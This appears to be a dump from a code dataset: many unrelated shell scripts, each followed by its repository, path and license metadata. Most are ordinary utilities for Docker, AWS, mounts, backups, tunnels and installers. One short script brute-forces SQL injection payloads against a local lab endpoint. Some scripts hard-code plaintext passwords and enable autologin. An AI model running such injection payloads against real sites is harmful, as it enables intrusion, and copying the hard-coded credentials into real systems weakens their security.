# $ cat example.csv
# 1,"Dagny Taggart",39
# 8,"Francisco D'Anconia",40
# 12,"Hank Rearden (a.k.a \"The Tank\")",46
#
dir=$(cd `dirname $0` && pwd)
if [[ $dir =~ \/bin$ ]]; then
awk=$dir/.jsonv/json.awk
log=$dir/.jsonv/log
json=$dir/.jsonv/json
tokens=$dir/.jsonv/tokens
map=$dir/.jsonv/map
else
awk=$dir/json.awk
log=$dir/tmp/log
json=$dir/tmp/json
tokens=$dir/tmp/tokens
map=$dir/tmp/map
fi
get_key () {
echo $1 | xargs | gawk -F. '{
for (i = 1; i <= NF; i++) {
if (i > 1) {
printf ",";
}
printf "\""$i"\"";
}
}'
}
echo_log () {
echo "[$(date +'%Y-%m-%d %H:%M:%S')] $1" >> $log
}
jsonv () {
echo_log "Writing JSON file"
cat /dev/stdin > $json
echo_log "Writing tokens file"
echo -e "$json\n" | gawk -f $awk > $tokens
echo_log "Deriving keys"
keys=()
for path in ${1//,/ }; do
keys+=($(get_key $path))
done
echo_log "Deriving prefix"
prefix=''
if [ "$2" != "" ]; then
prefix=$(get_key $2)","
fi
echo_log "Counting entries"
count=$(cat $tokens | sed 's/^[\["a-z,]*//g' | sed 's/,.*//g' | gawk '/^[0-9]+$/ && !_[$0]++' | gawk -F\t 'BEGIN{max=""} ($1 > max) {max=$1} END{print max}')
echo_log "Writing map file"
row=''
for key in "${keys[@]}"; do
row="$row[$prefix"INDEX",$key]\t"
done
echo -e $row | gawk -F\t -v n="$count" '{for(i=0;i<=n;i++) print}' | gawk -F\t '{gsub("INDEX",NR-1,$0); print $0}' > $map
echo_log "Deriving line format"
format=''
for ((i=1; i<=${#keys[@]}; i++)); do
if [ $i -gt 1 ]; then
format+='","'
fi
format+="a[\$"$i"]"
done
echo_log "Compiling CSV output"
program="'FNR==NR{a[\$1]=\$2; next} {print $format}'"
eval "gawk -F\\\t $program $tokens $map"
echo_log "Done."
echo "=====================" >> $log
}
if [[ "$1" == "-v" || "$1" == "--version" ]]; then
echo "0.2.0"
elif [ "$1" != "" ]; then
jsonv $1 $2
fi
|
CMeza99/TwitterControl
|
jsonv.sh
|
Shell
|
gpl-2.0
| 2,916 |
#!/bin/sh
docker stop omf_grip_run
docker rm omf_grip_run
#docker rmi omf_grip
|
dpinney/omf
|
omf/scratch/GRIP/helper/dockerClean.sh
|
Shell
|
gpl-2.0
| 79 |
#!/bin/bash
>/tmp/commands.list
#for i in {1..11000}; do
for i in {1..7000}; do
echo "http://da-ts03.bond/rewrite_"$i"/16000_BBB_Main_deu_20_16000k-HEVC-4K_track1_dashinit.mp4" >>/tmp/commands.list
done
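# fan the requests out with xargs, one curl worker per CPU core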
xargs -a /tmp/commands.list -P $(grep -c ^processor /proc/cpuinfo) -I COMMAND sh -c 'echo "COMMAND"; curl -s -o /dev/null "COMMAND"'
|
jursonovicst/tools
|
dashperf/populate.sh
|
Shell
|
gpl-2.0
| 343 |
#!/bin/bash
# Author: Mike Rodarte
#
# Listen to the log file and respond as necessary.
serverDir='/home/minecraft/minecraft'
logDir="${serverDir}/logs/"
logFile="${logDir}latest.log"
commandName='mcapi'
lastLine=''
# execute the listener while the log file exists
while [ -f $logFile ]; do
last=$(tail -1 $logFile)
# check to see if $commandName exists in $last
if [ "$last" != "$lastLine" ] && [[ "$last" == *"$commandName"* ]]; then
# get whatever follows $commandName
position=$(echo "$last" | grep -aob "$commandName" | head -n1 | grep -oE '^[0-9]+')
posCommand=$(( $position + ${#commandName} ))
cmd="${last:$posCommand}"
"${serverDir}/minecraft-server-helper/mcapi" $cmd
# do not keep doing this same command
lastLine="$last"
fi
done
|
mts7/minecraft-server-helper
|
mc-listener.sh
|
Shell
|
gpl-2.0
| 778 |
#!/usr/bin/env bash
QUERY=${1:-"this is a tes for splellchecker"}
PORT=${2:-8888}
INDEX_NAME=${3:-index_getjenny_english_0}
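# Usage: ./postSpellckeckTerms.sh [query] [port] [index_name]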
curl -v -H "Authorization: Basic $(echo -n 'test_user:p4ssw0rd' | base64)" \
-H "Content-Type: application/json" -X POST "http://localhost:${PORT}/${INDEX_NAME}/spellcheck/terms" -d "{
\"text\": \"${QUERY}\",
\"prefixLength\": 3,
\"minDocFreq\": 1
}"
|
GetJenny/starchat
|
scripts/api_test/postSpellckeckTerms.sh
|
Shell
|
gpl-2.0
| 386 |
#!/bin/sh
# Contributed by Barry Allard in 2.4.2.3 fork (github.com/steakknife/tripwire)
git clean -dff
git clean -Xff
rm -rf autom4te.cache
|
Tripwire/tripwire-open-source
|
contrib/clean.sh
|
Shell
|
gpl-2.0
| 141 |
#PBS -N otu-cluster
#PBS -m bea
#PBS -M [email protected]
#PBS -W group_list=bhurwitz
#PBS -q standard
#PBS -l select=1:ncpus=2:mem=4Gb
#PBS -l cput=6:0:0
#PBS -l walltime=24:00:00
set -u
source ${PROJECT_DIR}/config.sh
cd $FOR_OUT
${BIN_DIR}/usearch -cluster_otus ${FOR_SORTED} -otus ${FOR_OTU} -uparseout ${FOR_OTU_RESULTS} -otu_radius_pct ${OTU_RADIUS} 2> 05-for_otu_cluster_5.0.log
### Do above steps for the reverse reads
if [[ $PAIRED_END = "true" ]]; then
cd $REV_OUT
REV_BASENAME=$(basename ${REV_SORTED} _derep_sorted.fna)
${BIN_DIR}/usearch -cluster_otus ${REV_SORTED} -otus ${REV_OTU} -uparseout ${REV_OTU_RESULTS} -otu_radius_pct ${OTU_RADIUS} 2> 05-rev_otu_cluster_5.0.log
fi
|
hurwitzlab/amplicon-illumina
|
scripts/workers/05-otu-cluster_exec.sh
|
Shell
|
gpl-2.0
| 708 |
#!/bin/bash -ex
# Make sure the robofile is in the correct location.
cp modules/apigee_m10n/.circleci/RoboFile.php ./
# Update dependencies if necessary.
if [[ ! -f dependencies_updated ]]; then
robo setup:skeleton
robo add:dependencies-from modules/$1/composer.json
robo drupal:version $2
robo configure:m10n-dependencies
robo update:dependencies
robo do:extra $2
fi
# Touch a flag so we know dependencies have been set. Otherwise, there is no
# easy way to know this step needs to be done when running circleci locally since
# it does not support workflows.
touch dependencies_updated
|
apigee/apigee-m10n-drupal
|
.circleci/update-dependencies.sh
|
Shell
|
gpl-2.0
| 602 |
#!/bin/bash
# Purpose: Restores incremental backups of a given directory.
# Author: Ryan McDonald <[email protected]>
#######################################################################
DIR_TO_RESTORE=$1
BKP_DIR=$HOME/bkp #<- where incremental backups exist
#######################################################################
## validate parms:
#######################################################################
function usage {
echo "USAGE:"
echo " $0 relative_dir_to_be_restored"
echo
echo "Note: the dir to restore must resemble files in:"
echo " $BKP_DIR"
exit 1
}
if [[ -z $DIR_TO_RESTORE ]]; then
echo "Missing DIR_TO_RESTORE (the only parm)"
usage
fi
WILDCARD="$BKP_DIR/*$DIR_TO_RESTORE*tgz"
BKP_COUNT=$(ls $WILDCARD 2>/dev/null | wc -l)
if [[ $BKP_COUNT -lt 1 ]]; then
echo "Couldn't find any bkp files with:"
echo "ls $WILDCARD"
usage
fi
#######################################################################
## setup variables:
#######################################################################
STAMP=$(date +"%Y%m%d.%H%M%S")
RESTORE_DIR=${DIR_TO_RESTORE}_restored_$STAMP
#######################################################################
## restore the backups:
#######################################################################
mkdir $RESTORE_DIR
cd $RESTORE_DIR
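# extract each incremental archive in order; --listed-incremental=/dev/null makes tar honor the deletion records in each snapshot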
for TGZ in $(ls $WILDCARD); do
tar -z --extract --listed-incremental=/dev/null --file $TGZ
done
cd ..
echo "$DIR_TO_RESTORE has been restored to:"
echo
echo "./$(ls -d $RESTORE_DIR/$DIR_TO_RESTORE)"
echo
|
devops001/standard_scripts
|
restore.sh
|
Shell
|
gpl-2.0
| 1,557 |
#!/bin/bash
################################################################################
#
# Displays the mount information table
#
# Author: Luciano Gonçalez
#
################################################################################
# Definitions for this file
scriptiname="showmounts"
scriptgroup="futils"
scriptversion="0.5"
scriptdate="2014-0101"
# Default definitions (automatic)
lkspref="lks"
scriptalias="${scriptiname}.${lkspref}-${scriptgroup}"
scriptname="${lkspref}-${scriptiname}"
# Show unsupported-array error
function showerrorarray() {
cat << EOF | expand -t2 >&2
The current 'bash' does not support associative arrays!
EOF
}
# Show usage error message
function showerroruse() {
cat << EOF | expand -t2 >&2
Usage: ${scriptname}
Try '--help' or '-h' for more options.
EOF
}
# Show script version
function showversion() {
echo "$scriptversion"
}
# Show script alias
function showalias() {
echo "$scriptalias"
}
# Show script date
function showdate() {
echo "$scriptdate"
}
# Show script group
function showgroup() {
echo "$scriptgroup"
}
# Show internal script name
function showiname() {
echo "$scriptiname"
}
# Show original script name
function showname() {
echo "${scriptname}"
}
# Show the help text
function showhelp() {
cat << EOF | expand -t2 | less -XFe
lks-${scriptiname}.sh [v${scriptversion}] (${scriptgroup})
<alias: ${scriptiname}.lks-${scriptgroup}>
Script to display the mount information table
Usage:
lks ${scriptiname}
lks ${scriptiname} --all --sort
lks ${scriptiname} --help
lks ${scriptiname} --version <alias|date|group|iname|name>
lks ${scriptiname} -as
lks ${scriptiname} -h
lks ${scriptiname} -v
Options:
--all , -a : Show all mount points.
By default only physical-device mounts are shown;
--sort , -s : Sort the list;
--help, -h : Show this help text;
--version , -v : Show the script version. With an option, shows:
alias : Alias that can be used to call the script;
date : Version date;
group : Group this script belongs to (based on its functionality);
iname : Internal script name;
name : Original script name;
Written by: Luciano Gonçalez
EOF
}
# Main function
function main() {
list=$(
cat /proc/mounts | tr ' ' '\t' | while read -r line ; do
devname=$(echo -e "$line" | cut -f1)
tempname=$(readlink -e "$devname")
if [ -n "$tempname" ] ; then
devname="$tempname"
fi
mountname=$(echo -e "$line" | cut -f2)
fsname=$(echo -e "$line" | cut -f3)
labelname=$(blkid -s LABEL "$devname" | sed 's/.*LABEL="//' | sed 's/"\s*$//')
uuid=$(blkid -s UUID "$devname" | sed 's/.*UUID="//' | sed 's/"\s*$//')
echo -e "${devname}\t${mountname}\t${fsname}\t${uuid}\t${labelname}"
done
)
if ${option[sort]} ; then
if ${option[all]} ; then
echo "$list" | sort | grep -v '^/'
fi
echo "$list" | sort | grep '^/'
else
if ${option[all]} ; then
echo "$list"
else
echo "$list" | grep '^/'
fi
fi
}
# Parameter-checking function
function checkparameters() {
# Test mutually exclusive options
if ${option[help]} && ${option[version]} ; then
option[error]="true"
fi
# Perform one action
if ${option[error]} ; then
# Show error message
showerroruse
return 1
elif ${option[help]} ; then
# Show help text
showhelp
elif ${option[version]} ; then
case "${option[version_type]}" in
alias) showalias ;;
date) showdate ;;
group) showgroup ;;
iname) showiname ;;
name) showname ;;
*) showversion ;;
esac
else
# If everything is OK, call main
main
fi
}
# Start
{ # Parse parameters
if ! declare -A option ; then showerrorarray ; exit ; fi
option=(
[error]="false"
[help]="false"
[version]="false"
[version_type]=""
[all]="false"
[sort]="false"
)
while [ "${option[error]}" = "false" ] && [ $# -gt 0 ] ; do
if [ "${1:0:2}" = "--" ] ; then
case "$1" in
--help) option[help]="true" ;;
--version)
if ${option[version]} ; then
option[error]="true"
else
option[version]="true"
case "$2" in
alias|date|group|iname|name)
option[version_type]="$2"
shift
;;
esac
fi
;;
--all) option[all]="true" ;;
--sort) option[sort]="true" ;;
*) option[error]="true" ;;
esac
elif [ "${1:0:1}" = "-" ] ; then
paramopt="${1:1}"
while [ ${#paramopt} -gt 0 ] ; do
case "${paramopt:0:1}" in
h) option[help]="true" ;;
v)
if ${option[version]} ; then
option[error]="true"
else
option[version]="true"
fi
;;
a) option[all]="true" ;;
s) option[sort]="true" ;;
*) option[error]="true" ; break ;;
esac
paramopt="${paramopt:1}"
done
else
option[error]="true"
fi
shift
done
}
checkparameters
|
LucGoncalez/lkscripts
|
lks-showmounts.sh
|
Shell
|
gpl-2.0
| 4,906 |
# export AWS_ACCESS_KEY="Your-Access-Key"
# export AWS_SECRET_KEY="Your-Secret-Key"
today=`date +"%d-%m-%Y","%T"`
logfile="/awslog/ec2-access.log"
# Grab all Security Groups IDs for DISALLOW action and export the IDs to a text file
sudo aws ec2 describe-security-groups --filters Name=tag:close-allports-time,Values=05-00 Name=tag:bash-profile,Values=wd --query SecurityGroups[].[GroupId] --output text > ~/tmp/disallowall_wd_info.txt 2>&1
# Take list of changing security groups
for group_id in $(cat ~/tmp/disallowall_wd_info.txt)
do
# Change rules in security group
sudo aws ec2 revoke-security-group-ingress --group-id $group_id --protocol all --port all --cidr 0.0.0.0/0
# Put info into log file
echo "$today: attempted to disallow access to instances with attached group $group_id for all ports" >> $logfile
done
|
STARTSPACE/aws-access-to-ec2-by-timetable
|
all/disallow-wd/all-disallow-wd-05.sh
|
Shell
|
gpl-2.0
| 817 |
#!/bin/sh
_REPO='oriaks'
_DIR=`cd "$( dirname "$0" )" && pwd`
docker run -it --rm "${_REPO}/debian:latest"
|
oriaks/docker-debian
|
run.sh
|
Shell
|
gpl-2.0
| 109 |
echo "helo_name=mail.palepurple.co.uk
[email protected]
[email protected]
client_address=81.133.46.190
request=smtpd_access_policy
" | perl -I ../src -w ../src/policyd.pl
|
palepurple/policyd-dnsbl-spf-geoip
|
tests/test-bmc.sh
|
Shell
|
gpl-2.0
| 190 |
#! /bin/bash
function seperator
{
echo "--------------------------------------------------------------------------"
}
function cleanup
{
echo "deleting temporary files..."
rm -f .svnlog .contributors
}
function updatelog
{
cleanup
echo "getting svn log from server... this may take a while"
svn log -q > .svnlog
}
function catlog
{
cat .svnlog | grep '^r[0-9]' | grep -v "trikalio" | sed 's:Loggedoubt:loggedoubt:g'
}
function checkrev
{
if [ ! -f .svnlog ]; then
updatelog
fi
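# compare the working-copy revision with the newest revision in the cached log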
CREV=`svnversion . | sed 's:M::' | sed 's/.*://'`
LREV=`catlog | sed 's:^r::g' | sort -nr | head -n1 | awk '{print $1}'`
if [ "$CREV" -ne "$LREV" ]; then
echo "WARNING: local log is not up to date, use '$0 update' to update it."
fi
}
# create a list of all SVN contributors
function findcontributors
{
if [ ! -f .svnlog ]; then
updatelog
fi
catlog | awk '{print $3}' | sort | uniq > .contributors
}
function showcontributors
{
findcontributors
echo "showing all SVN contributors, sorted alphabetically:"
seperator
cat .contributors
}
# find last commit of a SVN contributor
function findlastcommit
{
catlog | sed 's:^r::g' | grep "$1" | sort -nr | head -n1
}
# find last commit of all SVN contributors
function findlastcommits
{
if [ ! -f .contributors ]; then
findcontributors
fi
while read line; do
findlastcommit $line
done < .contributors
}
# show last activity of all contributors
function showlastactivity
{
echo "showing last activity, sorted by date:"
seperator
findlastcommits | sort -nr | awk -F "|" '{printf "r%s %-20s %s\n", $1, $2, $3}'
}
function findcommitnumber
{
echo `catlog | grep "$1" | wc -l` "$1"
}
function findcommitnumbers
{
if [ ! -f .contributors ]; then
findcontributors
fi
while read line; do
findcommitnumber $line
done < .contributors
}
function showtotalactivity
{
echo "showing activity, sorted by number of commits:"
seperator
findcommitnumbers | sort -nr | awk '{printf "%6d %s\n", $1, $2}'
}
################################################################################
function usage
{
echo "usage: check-activity.sh <option>"
echo "where option is one of:"
echo "update - update local copy of SVN log"
echo "contributors - show alltime SVN contributor list"
echo "lastactivity - show last activity of all contributors"
echo "totalactivity - show number of all commits for all contributors"
echo "cleanup - remove temporary files"
echo "WARNING: The script will not automatically update the local SVN log, to"
echo " do that use the 'update' option manually. This is to save"
echo " (a lot of) time on subsequent runs."
exit
}
################################################################################
case $1 in
update)
updatelog ;;
contributors)
checkrev
showcontributors ;;
lastactivity)
checkrev
showlastactivity ;;
totalactivity)
checkrev
showtotalactivity ;;
cleanup)
cleanup ;;
*)
usage ;;
esac
|
AreaScout/vice-gles2
|
check-activity.sh
|
Shell
|
gpl-2.0
| 3,236 |
#!/bin/bash
CONF_DIR="/etc/lightdm/lightdm.conf.d"
#CONF_DIR="test-dir"
CONF_FILE="60-manual-login.conf"
if [ ! -d $CONF_DIR ];
then
mkdir $CONF_DIR
fi
echo "[SeatDefaults]" >> $CONF_DIR/$CONF_FILE
# Unity Greeter (and some other greeters) don't allow you to enter a username to log in with by default. You can enable this with:
echo "" >> $CONF_DIR/$CONF_FILE
echo "greeter-show-manual-login=true" >> $CONF_DIR/$CONF_FILE
# Unity Greeter (and some other greeters) shows the list of possible user accounts by default.
# If you want to disable this (you have too many users or security concerns) use the following configuration.
# You may also want to explicitly enable manual login with this feature.
echo "" >> $CONF_DIR/$CONF_FILE
#echo "greeter-hide-users=true" >> $CONF_DIR/$CONF_FILE
|
edvapp/autoinstall
|
laus/scriptsForClasses/ZZZARCHIVE/APP/APP1604/440-configLightdmForLDAP.sh
|
Shell
|
gpl-2.0
| 798 |
PATH=/bin:/usr/bin
export PATH
rm -rf t058-dir
mkdir t058-dir
mkdir t058-dir/emacs
mkdir t058-dir/w3-tools
echo "append-path PATH /usr/local" > t058-dir/local
echo "append-path PATH /usr/18.57" > t058-dir/emacs/18.57
echo "append-path PATH /usr/19.25.94" > t058-dir/emacs/19.25.94
echo "append-path PATH /usr/19.25.95" > t058-dir/emacs/19.25.95
echo "append-path PATH /usr/19.26" > t058-dir/emacs/19.26
echo "append-path PATH /usr/19.27" > t058-dir/emacs/19.27
echo "append-path PATH /usr/19.29" > t058-dir/emacs/19.29
echo "append-path PATH /usr/19.30" > t058-dir/emacs/19.30
echo "append-path PATH /usr/19.31" > t058-dir/emacs/19.31
echo "append-path PATH /usr/19.33" > t058-dir/emacs/19.33
echo "append-path PATH /usr/19.34" > t058-dir/emacs/19.34
echo "append-path PATH /usr/20.2" > t058-dir/emacs/20.2
echo "append-path PATH /usr/latest" > t058-dir/emacs/latest
echo "append-path PATH /usr/old" > t058-dir/emacs/old
echo "append-path PATH /usr/test" > t058-dir/emacs/test
echo "append-path PATH /usr/z" > t058-dir/emacs/z
echo "append-path PATH /usr/1.0" > t058-dir/w3-tools/1.0
MODULEPATH=t058-dir
export MODULEPATH
../cmod sh avail
|
yuhangwang/CMod
|
src/source/cmod-1.1/testsuite/t058.sh
|
Shell
|
gpl-2.0
| 1,140 |
#!/bin/sh
# 6rd.sh - IPv6-in-IPv4 tunnel backend
# Copyright (c) 2010-2012 OpenWrt.org
[ -n "$INCLUDE_ONLY" ] || {
. /lib/functions.sh
. /lib/functions/network.sh
. ../netifd-proto.sh
init_proto "$@"
}
tun_error() {
local cfg="$1"; shift;
[ -n "$1" ] && proto_notify_error "$cfg" "$@"
proto_block_restart "$cfg"
}
proto_6rd_setup() {
local cfg="$1"
local iface="$2"
local link="6rd-$cfg"
local mtu ttl ipaddr peeraddr ip6prefix ip6prefixlen ip4prefixlen
json_get_vars mtu ttl ipaddr peeraddr ip6prefix ip6prefixlen ip4prefixlen
[ -z "$ip6prefix" -o -z "$peeraddr" ] && {
tun_error "$cfg" "MISSING_ADDRESS"
return
}
[ -z "$ipaddr" ] && {
local wanif
if ! network_find_wan wanif || ! network_get_ipaddr ipaddr "$wanif"; then
tun_error "$cfg" "NO_WAN_LINK"
return
fi
}
# Determine the relay prefix.
local ip4prefixlen="${ip4prefixlen:-0}"
local ip4prefix=$(ipcalc.sh "$ipaddr/$ip4prefixlen" | grep NETWORK)
ip4prefix="${ip4prefix#NETWORK=}"
# Determine our IPv6 address.
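# (e.g. a 6rd prefix of 2001:db8::/32 with WAN address 192.0.2.1 and ip4prefixlen 0 yields 2001:db8:c000:201::1)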
local ip6subnet=$(6rdcalc "$ip6prefix/$ip6prefixlen" "$ipaddr/$ip4prefixlen")
local ip6addr="${ip6subnet%%::*}::1"
proto_init_update "$link" 1
proto_add_ipv6_address "$ip6addr" "$ip6prefixlen"
proto_add_ipv6_route "::" 0 "::$peeraddr"
proto_add_tunnel
json_add_string mode sit
json_add_int mtu "${mtu:-1280}"
json_add_int ttl "${ttl:-64}"
json_add_string local "$ipaddr"
json_add_string 6rd-prefix "$ip6prefix/$ip6prefixlen"
json_add_string 6rd-relay-prefix "$ip4prefix/$ip4prefixlen"
proto_close_tunnel
proto_send_update "$cfg"
}
proto_6rd_teardown() {
local cfg="$1"
}
proto_6rd_init_config() {
no_device=1
available=1
proto_config_add_int "mtu"
proto_config_add_int "ttl"
proto_config_add_string "peeraddr"
proto_config_add_string "ip6prefix"
proto_config_add_string "ip6prefixlen"
proto_config_add_string "ip4prefixlen"
}
[ -n "$INCLUDE_ONLY" ] || {
add_protocol 6rd
}
|
stephank/openwrt
|
package/6rd/files/6rd.sh
|
Shell
|
gpl-2.0
| 1,918 |
#!/bin/bash -x
#
# Generated - do not edit!
#
# Macros
TOP=`pwd`
CND_PLATFORM=ArduinoCustom-Linux-x86
CND_CONF=Debug
CND_DISTDIR=dist
CND_BUILDDIR=build
CND_DLIB_EXT=so
NBTMPDIR=${CND_BUILDDIR}/${CND_CONF}/${CND_PLATFORM}/tmp-packaging
TMPDIRNAME=tmp-packaging
OUTPUT_PATH=${CND_DISTDIR}/${CND_CONF}/${CND_PLATFORM}/timing
OUTPUT_BASENAME=timing
PACKAGE_TOP_DIR=timing/
# Functions
function checkReturnCode
{
rc=$?
if [ $rc != 0 ]
then
exit $rc
fi
}
function makeDirectory
# $1 directory path
# $2 permission (optional)
{
mkdir -p "$1"
checkReturnCode
if [ "$2" != "" ]
then
chmod $2 "$1"
checkReturnCode
fi
}
function copyFileToTmpDir
# $1 from-file path
# $2 to-file path
# $3 permission
{
cp "$1" "$2"
checkReturnCode
if [ "$3" != "" ]
then
chmod $3 "$2"
checkReturnCode
fi
}
# Setup
cd "${TOP}"
mkdir -p ${CND_DISTDIR}/${CND_CONF}/${CND_PLATFORM}/package
rm -rf ${NBTMPDIR}
mkdir -p ${NBTMPDIR}
# Copy files and create directories and links
cd "${TOP}"
makeDirectory "${NBTMPDIR}/timing/bin"
copyFileToTmpDir "${OUTPUT_PATH}" "${NBTMPDIR}/${PACKAGE_TOP_DIR}bin/${OUTPUT_BASENAME}" 0755
# Generate tar file
cd "${TOP}"
rm -f ${CND_DISTDIR}/${CND_CONF}/${CND_PLATFORM}/package/timing.tar
cd ${NBTMPDIR}
tar -vcf ../../../../${CND_DISTDIR}/${CND_CONF}/${CND_PLATFORM}/package/timing.tar *
checkReturnCode
# Cleanup
cd "${TOP}"
rm -rf ${NBTMPDIR}
|
Kaputnik120/AllProjects
|
Timing/nbproject/Package-Debug.bash
|
Shell
|
gpl-2.0
| 1,447 |
#!/bin/bash
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
${DIR}/qt${QT_VERSION}/before_install.sh
|
SebDieBln/QGIS
|
ci/travis/linux/before_install.sh
|
Shell
|
gpl-2.0
| 110 |
################################################################################
#
# This script is to automate installation of Linux Integration Services for
# Microsoft Hyper-V
#
################################################################################
# Determine kernel architecture version
osbit=`uname -m`
# Determine if its PAE kernel
#Selecting appropriate rpm, 64 bit rpm for x86_64 based VM
if [ "$osbit" == "x86_64" ]; then
{
kmodrpm=`ls lis-52/x86_64/kmod-microsoft-hyper-v-*.x86_64.rpm`
msrpm=`ls lis-52/x86_64/microsoft-hyper-v-*.x86_64.rpm`
}
elif [ "$osbit" == "i686" ]; then
PAE=` uname -r | grep PAE`
if [ "$PAE" == "" ]; then
{
kmodrpm=`ls lis-52/x86/kmod-microsoft-hyper-v-4*.i686.rpm`
msrpm=`ls lis-52/x86/microsoft-hyper-v-*.i686.rpm`
}
else
{
kmodrpm=`ls lis-52/x86/kmod-microsoft-hyper-v-PAE-*.i686.rpm`
msrpm=`ls lis-52/x86/microsoft-hyper-v-*.i686.rpm`
}
fi
fi
#Making sure both rpms are present
if [ "$kmodrpm" != "" ] && [ "$msrpm" != "" ]; then
echo "Installing the Linux Integration Services for Microsoft Hyper-V..."
rpm -ivh $kmodrpm
kmodexit=$?
if [ "$kmodexit" == 0 ]; then
rpm -ivh --nodeps $msrpm
msexit=$?
if [ "$msexit" != 0 ]; then
echo "Microsoft-Hyper-V rpm installation failed, Exiting"
exit 1;
else
echo " Linux Integration Services for Hyper-V has been installed. Please reboot your system"
fi
else
echo "Kmod RPM installation failed, Exiting"
exit 1
fi
else
echo "RPM's are missing"
fi
|
alexngmsft/lis-next
|
rpmbuild/LISISO/CentOS52/install.sh
|
Shell
|
gpl-2.0
| 1,782 |
for f in "0" "1" "2" "3" "4" "5" "6" "7" "8" "9" "A" "B" "C" "D" "E" "F":
do
for g in "0" "1" "2" "3" "4" "5" "6" "7" "8" "9" "A" "B" "C" "D" "E" "F":
do
curl "http://localhost/sqli/6?id=%$f$g'or1=1--"
done
done
|
syakesaba/webhack
|
sqli/utils/bf2.sh
|
Shell
|
gpl-2.0
| 232 |
#!/bin/bash
DATASET=adult
PROPERTY=14
BASEDIR=$(dirname $0)/..
CMD=$BASEDIR/target/universal/stage/bin/jsm-cli
sbt stage 2>&1
echo "--- Encoding of CSV"
$CMD encode -p $PROPERTY data/$DATASET.csv $DATASET.dat
echo "--- Randomized split of dataset"
$CMD split 8:2 $DATASET.dat $DATASET-training.dat $DATASET-verify.dat
echo "--- Produce dataset with hidden value out of verify dataset"
$CMD tau $DATASET-verify.dat $DATASET-tau.dat
echo "--- Generate model"
$CMD generate -m $DATASET-model.dat $DATASET-training.dat
echo "--- Run predictions on file with tau properties"
$CMD predict -m $DATASET-model.dat -o $DATASET-predictions.dat $DATASET-tau.dat
echo "--- Calculate basic stats on predictions"
$CMD stats $DATASET-verify.dat $DATASET-predictions.dat
|
DmitryOlshansky/jsm4s
|
scripts/adult.sh
|
Shell
|
gpl-2.0
| 754 |
#
# Copyright (c) 1998, 2013, Oracle and/or its affiliates. All rights reserved.
# DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
#
# This code is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2 only, as
# published by the Free Software Foundation.
#
# This code is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# version 2 for more details (a copy is included in the LICENSE file that
# accompanied this code).
#
# You should have received a copy of the GNU General Public License version
# 2 along with this work; if not, write to the Free Software Foundation,
# Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
# or visit www.oracle.com if you need additional information or have any
# questions.
#
# @ignore 8028733
# @test @(#)Test6626217.sh
# @bug 6626217
# @summary Loader-constraint table allows arrays instead of only the base-classes
# @run shell Test6626217.sh
#
## some tests require path to find test source dir
if [ "${TESTSRC}" = "" ]
then
TESTSRC=${PWD}
echo "TESTSRC not set. Using "${TESTSRC}" as default"
fi
echo "TESTSRC=${TESTSRC}"
## Adding common setup Variables for running shell tests.
. ${TESTSRC}/../../test_env.sh
JAVA=${TESTJAVA}${FS}bin${FS}java
JAVAC=${COMPILEJAVA}${FS}bin${FS}javac
# Current directory is scratch directory, copy all the test source there
# (for the subsequent moves to work).
${CP} ${TESTSRC}${FS}* ${THIS_DIR}
# A Clean Compile: this line will probably fail within jtreg as have a clean dir:
${RM} -f *.class *.impl many_loader.java
# Make sure that the compilation steps occurs in the future as not to allow fast systems
# to copy and compile bug_21227.java so fast as to make the class and java have the same
# time stamp, which later on would make the compilation step of many_loader.java fail
sleep 2
# Compile all the usual suspects, including the default 'many_loader'
${CP} many_loader1.java.foo many_loader.java
${JAVAC} ${TESTJAVACOPTS} -source 1.4 -target 1.4 -Xlint *.java
# Rename the class files, so the custom loader (and not the system loader) will find it
${MV} from_loader2.class from_loader2.impl2
# Compile the next version of 'many_loader'
${MV} many_loader.class many_loader.impl1
${CP} many_loader2.java.foo many_loader.java
${JAVAC} ${TESTJAVACOPTS} -source 1.4 -target 1.4 -Xlint many_loader.java
# Rename the class file, so the custom loader (and not the system loader) will find it
${MV} many_loader.class many_loader.impl2
${MV} many_loader.impl1 many_loader.class
${RM} many_loader.java
${JAVA} ${TESTVMOPTS} -Xverify -Xint -cp . bug_21227 >test.out 2>&1
grep "loader constraint" test.out
exit $?
|
arbeitspferde/openjdk9-hotspot
|
test/runtime/6626217/Test6626217.sh
|
Shell
|
gpl-2.0
| 2,947 |
# Dpu signals an error on wrong options
# $PROG program
# $EXITCODE exitcode
# $TEST path to this file
cmd $PROG --fjsdkl || $PROG --jjqkl || $PROG -4
test $EXITCODE != 0
#grep -i usage
test $(wc -l) -ge 1 # at least one line of output
|
cesaro/dpu
|
tests/regression/cmdargs/bad-option.test.sh
|
Shell
|
gpl-2.0
| 239 |
#!/bin/bash
if ! rpm -qa | grep deltarpm | grep -v grep >/dev/null
then
yum -y install deltarpm
fi
yum -y update
if ! ( yum grouplist | sed -n '/Installed environment/,/Available environment/p' | grep KDE >/dev/null 2>&1 )
then
yum -y groupinstall "KDE Plasma Workspaces"
yum -y install sharutils
fi
if ! grep student /etc/passwd >/dev/null 2>&1
then
useradd -m student
(sleep 5; echo "secret"; sleep 2; echo "secret") | passwd student
fi
if ! grep AutomaticLoginEnable /etc/gdm/custom.conf >/dev/null 2>&1
then
echo "[daemon]
AutomaticLoginEnable=true
AutomaticLogin=student
[security]
[xdmcp]
[greeter]
[chooser]
[debug]
" >/etc/gdm/custom.conf
fi
cd /home/student
uudecode $0
tar xvf neueda-linux.tar
mv lab exercise
chown -R student:student exercise
if ! (systemctl get-default | grep graphical.target >/dev/null 2>&1)
then
systemctl set-default graphical.target
init 6
fi
exit 0;
begin 664 neueda-linux.tar
M;&%B+P``````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````#`P-#`W-34`,#`R,38U,P`P,#`W,#`W`#`P,#`P,#`P,#`P
M`#`V-S<W,C(P,#(W`#`P,3$U-S<`-0``````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````````````````````````````````!U<W1A<@`P,&5V860`
M````````````````````````````````````8V,S-3DQ````````````````
M```````````````````P,#`P,S4S`#`P,#`V,3<`````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
